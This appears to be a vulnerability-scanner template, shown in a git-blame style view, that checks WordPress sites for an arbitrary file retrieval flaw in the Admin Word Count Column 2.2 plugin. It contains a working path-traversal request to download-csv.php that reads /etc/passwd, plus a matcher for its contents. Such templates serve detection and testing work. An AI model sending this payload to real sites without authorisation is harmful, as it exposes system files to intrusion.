2022-03-29 12:59:12 +00:00
|
|
|
id: admin-word-count-column-lfi
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Admin word count column 2.2 - Arbitrary File Retrieval
|
2022-03-29 12:59:12 +00:00
|
|
|
author: daffainfo,Splint3r7
|
|
|
|
severity: high
|
2022-04-02 10:39:39 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
|
|
|
|
- https://wordpress.org/plugins/admin-word-count-column/
|
2022-03-29 12:59:12 +00:00
|
|
|
tags: wordpress,wp-plugin,lfi,wp
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|